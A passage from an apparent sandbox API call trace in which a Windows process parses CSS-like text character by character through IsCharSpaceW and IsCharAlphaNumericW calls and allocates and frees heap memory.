(ch=0x3a) returned 0 [0227.872] IsCharSpaceW (wch=0x3a) returned 0 [0227.872] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.872] IsCharSpaceW (wch=0x20) returned 1 [0227.872] IsCharSpaceW (wch=0x31) returned 0 [0227.872] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.872] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.872] IsCharSpaceW (wch=0x3b) returned 0 [0227.872] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.872] IsCharSpaceW (wch=0xd) returned 1 [0227.872] IsCharSpaceW (wch=0xa) returned 1 [0227.872] IsCharSpaceW (wch=0x20) returned 1 [0227.872] IsCharSpaceW (wch=0x20) returned 1 [0227.872] IsCharSpaceW (wch=0x20) returned 1 [0227.872] IsCharSpaceW (wch=0x20) returned 1 [0227.872] IsCharSpaceW (wch=0x20) returned 1 [0227.872] IsCharSpaceW (wch=0x20) returned 1 [0227.872] IsCharSpaceW (wch=0x20) returned 1 [0227.872] IsCharSpaceW (wch=0x20) returned 1 [0227.872] IsCharSpaceW (wch=0x6c) returned 0 [0227.872] IsCharSpaceW (wch=0x78) returned 0 [0227.872] IsCharSpaceW (wch=0x31) returned 0 [0227.872] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xa) returned 0x57c3b8 [0227.872] IsCharSpaceW (wch=0x31) returned 0 [0227.872] IsCharSpaceW (wch=0x31) returned 0 [0227.872] IsCharSpaceW (wch=0x30) returned 0 [0227.872] IsCharSpaceW (wch=0x70) returned 0 [0227.872] IsCharSpaceW (wch=0x78) returned 0 [0227.872] IsCharSpaceW (wch=0x31) returned 0 [0227.872] IsCharSpaceW (wch=0x70) returned 0 [0227.872] IsCharSpaceW (wch=0x70) returned 0 [0227.872] IsCharSpaceW (wch=0x78) returned 0 [0227.872] IsCharSpaceW (wch=0x0) returned 0 [0227.872] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x55cd50, Size=0x90) returned 0x57a760 [0227.872] IsCharSpaceW (wch=0x31) returned 0 [0227.872] IsCharSpaceW (wch=0x70) returned 0 [0227.872] IsCharSpaceW (wch=0x70) returned 0 [0227.872] IsCharSpaceW (wch=0x78) returned 0 [0227.872] IsCharSpaceW (wch=0x0) returned 0 [0227.873] IsCharSpaceW (wch=0x31) returned 0 [0227.873] IsCharSpaceW (wch=0x70) returned 0 [0227.873] IsCharSpaceW (wch=0x70) returned 0 [0227.873] IsCharSpaceW (wch=0x78) returned 0 [0227.873] IsCharSpaceW (wch=0x0) returned 0 [0227.873] IsCharSpaceW (wch=0x31) returned 0 [0227.873] IsCharSpaceW (wch=0x70) returned 0 [0227.873] IsCharSpaceW (wch=0x70) returned 0 [0227.873] IsCharSpaceW (wch=0x78) returned 0 [0227.873] IsCharSpaceW (wch=0x0) returned 0 [0227.873] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x57a760, Size=0xd0) returned 0x57a760 [0227.873] IsCharSpaceW (wch=0x0) returned 0 [0227.873] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x57c3b8 | out: hHeap=0x510000) returned 1 [0227.873] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.873] IsCharSpaceW (wch=0x3a) returned 0 [0227.873] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.873] IsCharSpaceW (wch=0x20) returned 1 [0227.873] IsCharSpaceW (wch=0x32) returned 0 [0227.873] IsCharAlphaNumericW (ch=0x32) returned 1 [0227.873] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.873] IsCharSpaceW (wch=0x3b) returned 0 [0227.873] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.873] IsCharSpaceW (wch=0xd) returned 1 [0227.873] IsCharSpaceW (wch=0xa) returned 1 [0227.873] IsCharSpaceW (wch=0x20) returned 1 [0227.873] IsCharSpaceW (wch=0x20) returned 1 [0227.873] IsCharSpaceW (wch=0x20) returned 1 [0227.873] IsCharSpaceW (wch=0x20) returned 1 [0227.873] IsCharSpaceW (wch=0x20) returned 1 [0227.873] IsCharSpaceW (wch=0x20) returned 1 [0227.873] IsCharSpaceW (wch=0x20) returned 1 [0227.873] IsCharSpaceW (wch=0x20) returned 1 [0227.873] IsCharSpaceW (wch=0x62) returned 0 [0227.873] IsCharSpaceW (wch=0x78) returned 0 [0227.873] IsCharSpaceW (wch=0x32) returned 0 [0227.873] IsCharSpaceW (wch=0x32) returned 0 [0227.873] IsCharSpaceW (wch=0x70) returned 0 [0227.873] IsCharSpaceW (wch=0x70) returned 0 [0227.874] IsCharSpaceW (wch=0x78) returned 0 [0227.874] IsCharSpaceW (wch=0x0) returned 0 [0227.874] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.874] IsCharSpaceW (wch=0x3a) returned 0 [0227.874] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.874] IsCharSpaceW (wch=0x20) returned 1 [0227.874] IsCharSpaceW (wch=0x23) returned 0 [0227.874] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.874] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.874] IsCharSpaceW (wch=0x3b) returned 0 [0227.874] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.874] IsCharSpaceW (wch=0xd) returned 1 [0227.874] IsCharSpaceW (wch=0xa) returned 1 [0227.874] IsCharSpaceW (wch=0x20) returned 1 [0227.874] IsCharSpaceW (wch=0x20) returned 1 [0227.874] IsCharSpaceW (wch=0x20) returned 1 [0227.874] IsCharSpaceW (wch=0x20) returned 1 [0227.874] IsCharSpaceW (wch=0x20) returned 1 [0227.874] IsCharSpaceW (wch=0x20) returned 1 [0227.874] IsCharSpaceW (wch=0x7d) returned 0 [0227.874] IsCharSpaceW (wch=0x44) returned 0 [0227.874] IsCharSpaceW (wch=0x23) returned 0 [0227.874] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x57c3b8 [0227.874] IsCharSpaceW (wch=0x23) returned 0 [0227.874] IsCharSpaceW (wch=0x23) returned 0 [0227.874] IsCharSpaceW (wch=0x45) returned 0 [0227.874] IsCharSpaceW (wch=0x44) returned 0 [0227.874] IsCharSpaceW (wch=0x45) returned 0 [0227.874] IsCharSpaceW (wch=0x44) returned 0 [0227.874] IsCharSpaceW (wch=0x45) returned 0 [0227.874] IsCharSpaceW (wch=0x44) returned 0 [0227.874] IsCharSpaceW (wch=0x23) returned 0 [0227.874] IsCharSpaceW (wch=0x30) returned 0 [0227.874] IsCharSpaceW (wch=0x25) returned 0 [0227.874] IsCharSpaceW (wch=0x25) returned 0 [0227.874] IsCharSpaceW (wch=0x0) returned 0 [0227.874] IsCharSpaceW (wch=0x30) returned 0 [0227.874] IsCharSpaceW (wch=0x25) returned 0 [0227.874] IsCharSpaceW (wch=0x25) returned 0 [0227.874] IsCharSpaceW (wch=0x0) returned 0 [0227.875] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x2) returned 0x55e828 [0227.875] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x57a760, Size=0x130) returned 0x57a760 [0227.875] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x57c3b8 | out: hHeap=0x510000) returned 1 [0227.875] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.875] IsCharSpaceW (wch=0xd) returned 1 [0227.875] IsCharSpaceW (wch=0xa) returned 1 [0227.875] IsCharSpaceW (wch=0x9) returned 1 [0227.875] IsCharSpaceW (wch=0x20) returned 1 [0227.875] IsCharSpaceW (wch=0x20) returned 1 [0227.875] IsCharSpaceW (wch=0x69) returned 0 [0227.875] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x57c3b8 [0227.875] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x57c3d0 [0227.875] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.875] IsCharSpaceW (wch=0x20) returned 1 [0227.875] IsCharSpaceW (wch=0x7b) returned 0 [0227.875] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x5807e0 [0227.875] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x57a4e0 [0227.875] IsCharSpaceW (wch=0x20) returned 1 [0227.875] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.875] IsCharSpaceW (wch=0xd) returned 1 [0227.875] IsCharSpaceW (wch=0xa) returned 1 [0227.875] IsCharSpaceW (wch=0x9) returned 1 [0227.875] IsCharSpaceW (wch=0x9) returned 1 [0227.875] IsCharSpaceW (wch=0x64) returned 0 [0227.875] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x57a4e0 | out: hHeap=0x510000) returned 1 [0227.875] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.875] IsCharSpaceW (wch=0x3a) returned 0 [0227.875] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1c) returned 0x549738 [0227.875] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.875] IsCharSpaceW (wch=0x69) returned 0 [0227.875] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.875] IsCharSpaceW (wch=0x3b) returned 0 [0227.875] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.875] IsCharSpaceW (wch=0xd) returned 1 [0227.875] IsCharSpaceW (wch=0xa) returned 1 [0227.875] IsCharSpaceW (wch=0x9) returned 1 [0227.875] IsCharSpaceW (wch=0x20) returned 1 [0227.876] IsCharSpaceW (wch=0x20) returned 1 [0227.876] IsCharSpaceW (wch=0x7d) returned 0 [0227.876] IsCharSpaceW (wch=0x6b) returned 0 [0227.876] IsCharSpaceW (wch=0x69) returned 0 [0227.876] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x580800 [0227.876] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x560bf8 [0227.876] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.876] IsCharSpaceW (wch=0xd) returned 1 [0227.876] IsCharSpaceW (wch=0xa) returned 1 [0227.876] IsCharSpaceW (wch=0x20) returned 1 [0227.876] IsCharSpaceW (wch=0x20) returned 1 [0227.876] IsCharSpaceW (wch=0x20) returned 1 [0227.876] IsCharSpaceW (wch=0x20) returned 1 [0227.876] IsCharSpaceW (wch=0x20) returned 1 [0227.876] IsCharSpaceW (wch=0x20) returned 1 [0227.876] IsCharSpaceW (wch=0x2e) returned 0 [0227.876] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x57c3e8 [0227.876] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.876] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x580820 [0227.876] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x57a4e0 [0227.876] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.876] IsCharSpaceW (wch=0x20) returned 1 [0227.876] IsCharSpaceW (wch=0x7b) returned 0 [0227.876] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8) returned 0x55e838 [0227.876] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x16) returned 0x580840 [0227.876] IsCharSpaceW (wch=0x20) returned 1 [0227.876] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.876] IsCharSpaceW (wch=0xd) returned 1 [0227.876] IsCharSpaceW (wch=0xa) returned 1 [0227.876] IsCharSpaceW (wch=0x20) returned 1 [0227.876] IsCharSpaceW (wch=0x20) returned 1 [0227.876] IsCharSpaceW (wch=0x20) returned 1 [0227.876] IsCharSpaceW (wch=0x20) returned 1 [0227.876] IsCharSpaceW (wch=0x20) returned 1 [0227.876] IsCharSpaceW (wch=0x20) returned 1 [0227.876] IsCharSpaceW (wch=0x20) returned 1 [0227.876] IsCharSpaceW (wch=0x20) returned 1 [0227.876] IsCharSpaceW (wch=0x66) returned 0 [0227.876] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x57a4e0 | out: hHeap=0x510000) returned 1 [0227.876] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.876] IsCharSpaceW (wch=0x3a) returned 0 [0227.876] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1c) returned 0x549760 [0227.876] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.877] IsCharSpaceW (wch=0x20) returned 1 [0227.877] IsCharSpaceW (wch=0x62) returned 0 [0227.877] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.877] IsCharSpaceW (wch=0x3b) returned 0 [0227.877] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.877] IsCharSpaceW (wch=0xd) returned 1 [0227.877] IsCharSpaceW (wch=0xa) returned 1 [0227.877] IsCharSpaceW (wch=0x20) returned 1 [0227.877] IsCharSpaceW (wch=0x20) returned 1 [0227.877] IsCharSpaceW (wch=0x20) returned 1 [0227.877] IsCharSpaceW (wch=0x20) returned 1 [0227.877] IsCharSpaceW (wch=0x20) returned 1 [0227.877] IsCharSpaceW (wch=0x20) returned 1 [0227.877] IsCharSpaceW (wch=0x7d) returned 0 [0227.877] IsCharSpaceW (wch=0x64) returned 0 [0227.877] IsCharSpaceW (wch=0x62) returned 0 [0227.877] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x5854c0 [0227.877] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x560c40 [0227.877] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.877] IsCharSpaceW (wch=0xd) returned 1 [0227.877] IsCharSpaceW (wch=0xa) returned 1 [0227.877] IsCharSpaceW (wch=0x20) returned 1 [0227.877] IsCharSpaceW (wch=0x20) returned 1 [0227.877] IsCharSpaceW (wch=0x20) returned 1 [0227.877] IsCharSpaceW (wch=0x20) returned 1 [0227.877] IsCharSpaceW (wch=0x20) returned 1 [0227.877] IsCharSpaceW (wch=0x20) returned 1 [0227.877] IsCharSpaceW (wch=0x2e) returned 0 [0227.877] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x57c400 [0227.877] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x128) returned 0x57a898 [0227.877] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x4) returned 0x55e848 [0227.877] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.878] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x5854e0 [0227.878] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x57a4e0 [0227.878] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.878] IsCharSpaceW (wch=0x20) returned 1 [0227.878] IsCharSpaceW (wch=0x7b) returned 0 [0227.878] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8) returned 0x55e858 [0227.878] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x16) returned 0x585500 [0227.878] IsCharSpaceW (wch=0x20) returned 1 [0227.878] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.878] IsCharSpaceW (wch=0xd) returned 1 [0227.878] IsCharSpaceW (wch=0xa) returned 1 [0227.878] IsCharSpaceW (wch=0x20) returned 1 [0227.878] IsCharSpaceW (wch=0x20) returned 1 [0227.878] IsCharSpaceW (wch=0x20) returned 1 [0227.878] IsCharSpaceW (wch=0x20) returned 1 [0227.878] IsCharSpaceW (wch=0x20) returned 1 [0227.878] IsCharSpaceW (wch=0x20) returned 1 [0227.878] IsCharSpaceW (wch=0x20) returned 1 [0227.878] IsCharSpaceW (wch=0x20) returned 1 [0227.878] IsCharSpaceW (wch=0x62) returned 0 [0227.878] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x57a4e0 | out: hHeap=0x510000) returned 1 [0227.878] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.878] IsCharSpaceW (wch=0x3a) returned 0 [0227.878] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1c) returned 0x549788 [0227.878] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.878] IsCharSpaceW (wch=0x20) returned 1 [0227.878] IsCharSpaceW (wch=0x23) returned 0 [0227.878] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.878] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.878] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.878] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.878] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.879] IsCharAlphaNumericW (ch=0x32) returned 1 [0227.879] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.879] IsCharAlphaNumericW (ch=0x35) returned 1 [0227.879] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.879] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.879] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.879] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.879] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x585540 [0227.879] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x57a4e0 [0227.879] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.879] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.879] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.879] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.879] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.879] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.879] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.879] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.879] IsCharAlphaNumericW (ch=0x33) returned 1 [0227.879] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.879] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.879] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.879] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.879] IsCharAlphaNumericW (ch=0x35) returned 1 [0227.879] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.879] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.880] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.880] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.880] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.880] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.880] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.880] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.880] IsCharAlphaNumericW (ch=0x32) returned 1 [0227.880] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.880] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.880] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.880] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.880] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x5855a0 [0227.880] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x57a4e0 [0227.880] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.880] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.880] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.880] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.880] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.880] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.880] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.881] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.881] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.881] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.881] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.881] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.881] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.881] IsCharAlphaNumericW (ch=0x30) returned 1 [0227.881] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.881] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.881] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.881] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.881] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x585600 [0227.881] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x57a4e0 [0227.881] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.881] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.881] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.881] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.881] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.881] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.881] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.881] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.882] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.882] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.882] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.882] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.882] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.882] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.882] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.882] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.882] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.882] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x585580 [0227.882] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x57a4e0 [0227.882] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.882] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.882] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.882] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.882] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.882] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.882] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.882] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.882] IsCharAlphaNumericW (ch=0x30) returned 1 [0227.882] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.882] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.883] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.883] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.883] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.883] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.883] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.883] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.883] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.883] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x585680 [0227.883] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x57a4e0 [0227.883] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.883] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.883] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.883] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.883] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.883] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.883] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.883] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.883] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.883] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.883] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.884] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.884] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.884] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.884] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.884] IsCharAlphaNumericW (ch=0x30) returned 1 [0227.884] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.884] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.884] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.884] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.884] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x5856e0 [0227.884] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x57a4e0 [0227.884] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.884] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.884] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x57a4e0 | out: hHeap=0x510000) returned 1 [0227.884] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x585700 [0227.884] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x57a4e0 [0227.884] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.884] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.884] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.884] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.884] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.884] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.884] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.884] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.884] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.884] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.885] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.885] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.885] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.885] IsCharAlphaNumericW (ch=0x33) returned 1 [0227.885] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.885] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.885] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.885] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.885] IsCharAlphaNumericW (ch=0x33) returned 1 [0227.885] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.885] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.885] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.885] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.885] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.885] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.885] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.885] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.885] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.885] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x585760 [0227.885] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x57a4e0 [0227.885] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.885] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.885] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x57a4e0 | out: hHeap=0x510000) returned 1 [0227.885] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x585780 [0227.885] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x57a4e0 [0227.886] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.886] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.886] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.886] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.886] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.886] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.886] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.886] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.886] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.886] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x5857c0 [0227.886] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x57a4e0 [0227.886] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.886] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.886] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.886] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.886] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.886] IsCharAlphaNumericW (ch=0x30) returned 1 [0227.886] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.886] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.886] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.886] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.886] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x585820 [0227.886] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x57a4e0 [0227.886] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.887] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.887] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.887] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.887] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.887] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.887] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.887] IsCharAlphaNumericW (ch=0x3b) returned 